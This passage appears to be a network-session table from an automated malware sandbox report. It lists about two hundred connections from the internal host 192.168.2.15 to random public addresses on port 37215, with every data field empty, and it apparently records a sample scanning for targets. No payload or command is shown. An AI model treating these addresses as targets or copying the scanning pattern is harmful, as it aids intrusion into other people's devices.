                                                                            26393192.168.2.1535358197.153.116.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26394192.168.2.1554950197.164.187.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26395192.168.2.1553120197.8.118.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26396192.168.2.1540242197.99.22.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26397192.168.2.1558650197.127.12.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26398192.168.2.1532886197.64.80.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26399192.168.2.1556002197.76.171.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26400192.168.2.1545246197.155.96.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26401192.168.2.1538668197.195.189.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26402192.168.2.1541520197.222.165.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26403192.168.2.1543046197.189.14.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26404192.168.2.1551876197.47.231.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26405192.168.2.1558626197.131.51.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26406192.168.2.1545266197.52.127.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26407192.168.2.1549812197.64.119.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26408192.168.2.1542062197.169.153.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26409192.168.2.1549042197.143.203.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26410192.168.2.1555906197.127.205.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26411192.168.2.1560886197.37.124.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26412192.168.2.1552754197.70.196.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26413192.168.2.1551334197.250.200.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26414192.168.2.1550092197.223.40.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26415192.168.2.1550398197.35.106.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26416192.168.2.1554048197.236.189.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26417192.168.2.1556178197.38.57.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26418192.168.2.1545670197.118.182.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26419192.168.2.1536356197.252.189.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26420192.168.2.1540390197.164.37.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26421192.168.2.1547472197.160.141.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26422192.168.2.1549856197.211.85.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26423192.168.2.1533406197.15.33.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26424192.168.2.1537848197.178.47.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26425192.168.2.1541462197.229.123.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26426192.168.2.1537696197.239.95.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26427192.168.2.1557720197.49.40.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26428192.168.2.1550708197.61.234.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26429192.168.2.1550704197.141.195.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26430192.168.2.1545418197.127.223.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26431192.168.2.1550936156.25.65.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26432192.168.2.1553050156.146.247.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26433192.168.2.1533178156.96.176.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26434192.168.2.1557058156.104.70.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26435192.168.2.1554658156.83.120.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26436192.168.2.1547976156.17.172.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26437192.168.2.1548618156.214.234.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26438192.168.2.1538266156.15.121.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26439192.168.2.1549208156.99.4.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26440192.168.2.1557870156.71.53.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26441192.168.2.1541288156.144.100.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26442192.168.2.1549174156.103.66.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26443192.168.2.1548534156.5.92.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26444192.168.2.1554172156.74.56.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26445192.168.2.1540980156.19.159.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26446192.168.2.1559416156.109.67.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26447192.168.2.1555936156.75.162.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26448192.168.2.1535178156.211.14.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26449192.168.2.1540282156.135.35.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26450192.168.2.1559360156.231.76.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26451192.168.2.1545034156.0.95.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26452192.168.2.1540246156.239.233.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26453192.168.2.1552108156.77.43.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26454192.168.2.1548230156.251.145.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26455192.168.2.1552166156.178.35.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26456192.168.2.1556524156.221.152.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26457192.168.2.1534536156.170.133.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26458192.168.2.1542598156.2.78.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26459192.168.2.1539826156.8.168.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26460192.168.2.1536096156.42.160.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26461192.168.2.1545294156.25.180.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26462192.168.2.1547816156.91.56.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26463192.168.2.1545896156.247.229.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26464192.168.2.1557780156.230.49.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26465192.168.2.1555494156.34.96.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26466192.168.2.1545800156.14.168.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26467192.168.2.1560622156.37.28.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26468192.168.2.1549270156.162.227.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26469192.168.2.1540826156.101.126.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26470192.168.2.1534200156.75.221.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26471192.168.2.1557002156.26.105.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26472192.168.2.1554362156.82.18.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26473192.168.2.1559688156.36.25.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26474192.168.2.1558844156.233.253.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26475192.168.2.1558958156.36.149.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26476192.168.2.1549772156.45.245.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26477192.168.2.1558758156.87.167.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26478192.168.2.1541564156.70.103.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26479192.168.2.1552168156.68.163.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26480192.168.2.1540140156.43.241.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26481192.168.2.1542738156.66.9.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26482192.168.2.1555726156.235.117.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26483192.168.2.1557364156.242.5.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26484192.168.2.1554548156.39.25.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26485192.168.2.1557344156.152.71.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26486192.168.2.1538206156.73.172.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26487192.168.2.1552008156.108.21.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26488192.168.2.1534906156.163.57.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26489192.168.2.1555612156.97.4.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26490192.168.2.1534328156.159.15.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26491192.168.2.1543728156.226.85.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26492192.168.2.1541196156.0.231.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26493192.168.2.1547226156.111.110.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26494192.168.2.1544358156.122.128.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26495192.168.2.1550938156.164.80.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26496192.168.2.1543932156.106.118.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26497192.168.2.1545298156.239.161.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26498192.168.2.1539582156.148.15.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26499192.168.2.1554324156.236.225.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26500192.168.2.1543498156.59.17.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26501192.168.2.1537398156.6.23.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26502192.168.2.1560940156.229.42.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26503192.168.2.1550732156.81.199.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26504192.168.2.1538862156.217.99.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26505192.168.2.1536598156.239.222.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26506192.168.2.1541648156.58.244.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26507192.168.2.1534770156.222.100.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26508192.168.2.1549682156.10.82.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26509192.168.2.1547632156.60.52.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26510192.168.2.1557618156.61.184.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26511192.168.2.1546212156.103.142.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26512192.168.2.1554118156.182.19.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26513192.168.2.1551198156.192.73.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26514192.168.2.1551634156.152.135.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26515192.168.2.1551610156.196.30.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26516192.168.2.1539224156.24.169.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26517192.168.2.1545370156.230.155.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26518192.168.2.1550230156.200.212.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26519192.168.2.1547978156.130.207.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26520192.168.2.1548264156.222.141.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26521192.168.2.1540164156.27.121.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26522192.168.2.1540896156.125.151.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26523192.168.2.1550112156.57.82.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26524192.168.2.1545702156.203.141.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26525192.168.2.1538948156.93.200.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26526192.168.2.1534816156.214.105.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26527192.168.2.1544224156.111.30.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26528192.168.2.1539920156.190.83.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26529192.168.2.1537050156.120.7.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26530192.168.2.1546394156.151.69.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26531192.168.2.1546672156.201.241.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26532192.168.2.1551558156.3.7.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26533192.168.2.1536484156.53.194.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26534192.168.2.1536022156.152.130.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26535192.168.2.1532852156.38.172.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26536192.168.2.1546428156.250.86.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26537192.168.2.1537530156.228.214.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26538192.168.2.1549612156.129.144.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26539192.168.2.1550286156.39.240.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26540192.168.2.1539182156.54.136.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26541192.168.2.1555980156.138.73.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26542192.168.2.1556806156.12.254.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26543192.168.2.1537346156.20.56.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26544192.168.2.1557590156.94.190.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26545192.168.2.1546968156.39.121.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26546192.168.2.1533490156.80.168.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26547192.168.2.1537118156.57.43.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26548192.168.2.1540892156.194.140.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26549192.168.2.1546318156.176.173.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26550192.168.2.1556462156.162.46.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26551192.168.2.1560416156.22.195.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26552192.168.2.1550724156.181.201.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26553192.168.2.1547230156.234.247.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26554192.168.2.1551418156.233.68.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26555192.168.2.1555474156.66.15.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26556192.168.2.1557470156.128.21.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26557192.168.2.1547372156.177.98.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26558192.168.2.1535416156.2.45.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26559192.168.2.1539486156.47.118.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26560192.168.2.1543146156.229.233.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26561192.168.2.1558350156.221.45.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26562192.168.2.1554234156.6.233.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26563192.168.2.1552826156.55.1.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26564192.168.2.1538334156.253.93.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26565192.168.2.1551820156.6.209.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26566192.168.2.1550246156.166.57.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26567192.168.2.1535752156.124.38.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26568192.168.2.1553198156.61.228.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26569192.168.2.1533324156.88.123.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26570192.168.2.1542846197.197.78.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26571192.168.2.1547590197.123.221.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26572192.168.2.1535728197.12.162.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26573192.168.2.1533178197.20.252.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26574192.168.2.1552026197.206.213.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26575192.168.2.1555320197.203.239.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26576192.168.2.1544064197.92.126.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26577192.168.2.1544854197.152.65.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26578192.168.2.1544426197.187.119.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26579192.168.2.1546604197.73.169.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26580192.168.2.1550726197.92.38.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26581192.168.2.1544672197.13.41.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26582192.168.2.1536196197.99.101.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26583192.168.2.1552772197.208.13.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26584192.168.2.1548880197.189.102.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26585192.168.2.1540344197.148.127.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26586192.168.2.1558274197.112.137.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26587192.168.2.1545330197.95.147.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26588192.168.2.1549548197.20.169.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26589192.168.2.1556116197.233.66.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26590192.168.2.1554032197.103.163.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26591192.168.2.1533856197.23.38.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            26592192.168.2.1537056197.43.76.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
